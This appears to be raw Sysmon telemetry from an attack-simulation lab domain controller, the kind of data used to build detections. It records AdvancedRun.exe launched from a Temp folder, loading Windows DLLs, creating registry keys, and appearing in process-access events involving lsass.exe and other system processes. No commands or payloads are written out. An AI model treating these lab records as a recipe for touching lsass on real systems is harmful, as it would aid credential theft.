WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:04.993{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 
12241200x80000000000000004068422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004068421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004068420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.203{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.203{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4770 (rs1_release.211101-1440)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=31A5C5B3C53CA5692BDE66730F5F09A9,SHA256=829D456F894EDBBC4F0EC02627788D31801743BB047D6FD100BE05F0CBCFB2E1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:04.199{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.199{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wkscli.dll10.0.14393.4886 (rs1_release.220104-1735)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3E8769CD76B02894C3881018E0F9334C,SHA256=9DE69FDC7C3FE2ED664F68191CC92367B377FC096E42E2895FBF50D98D150A5CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.198{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.197{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.192{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=B7B1A7C51A29273242E59A7AEC3CF193,SHA256=474C74D69EFC73F999687E998E9B05EF0E6A8F78A1A8E89D5E390411E4B91C05trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.192{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4770 (rs1_release.211101-1440)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=C75F602912711A5B1270583E08F08C44,SHA256=571BBC3AD8076548129046D7432FB703235F0F6145109C15C0356C874985C239trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.191{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ieframe.dll11.00.14393.4886 (rs1_release.220104-1735)Internet BrowserInternet ExplorerMicrosoft CorporationIEFRAME.DLLMD5=7391061488EF087EC8B923263F5901E3,SHA256=5434336F96071153401C0616C4DCCA942D259EC97A102DBF590CA401F2E6EBA1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:03.985{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 12241200x80000000000000004068386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:03.993{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004068385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:03.990{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004068366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.917{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.14393.4886_none_f67b299ef24e3cc8\GdiPlus.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft GDI+Microsoft® Windows® Operating SystemMicrosoft CorporationgdiplusMD5=3033965E4D4268DA640BBD453A75C6AB,SHA256=C568E3A1429BE3EAF98B309B4E0A3E940FB00ACFB7C73ADF92947A4B61650490trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:03.933{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.864{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wpdshext.dll10.0.14393.4169 (rs1_release.210107-1130)Portable Devices Shell ExtensionMicrosoft® Windows® Operating SystemMicrosoft CorporationWpdShExt.dllMD5=CD64A4E76AE86A8F150A0887A989490E,SHA256=D68D76FF62932D6202E0476172E9CAF135B4DD8E224895436A4AB99FDFB2433FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.811{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\DevDispItemProvider.dll10.0.14393.0 (rs1_release.160715-1616)DeviceItem inproc devquery subsystemMicrosoft® Windows® Operating SystemMicrosoft CorporationDevDispItemProvider.dllMD5=4FE46B3CD310664F540E4712103570E1,SHA256=D08940F1AE6F9B63872763E14950ADCACBA34BFC8ADB070563BF6FDA6E17E955trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.796{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\PlayToDevice.dll10.0.14393.4169 (rs1_release.210107-1130)PLAYTODEVICE DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPlaytoDevice.dllMD5=171ADC2789D5DC6B6316A0C9060419E4,SHA256=67E15E6F78A4777B312641F2D9CFCB1CB2B1F9784F75321155126B3038892DB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.775{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dlnashext.dll10.0.14393.4169 (rs1_release.210107-1130)DLNA Namespace DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationdlnashext.dllMD5=BA4EF83084B94D36767C9413812E01BD,SHA256=F77B664AC17417F5066805CF880769DE6159F7BF2BB60BF25284C23FAA089AEAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.797{834264DD-DAE6-61EA-0D00-000000002702}876136C:\Windows\system32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:03.765{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.468{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.467{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.467{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.463{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.462{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.462{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.461{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.423{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.423{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 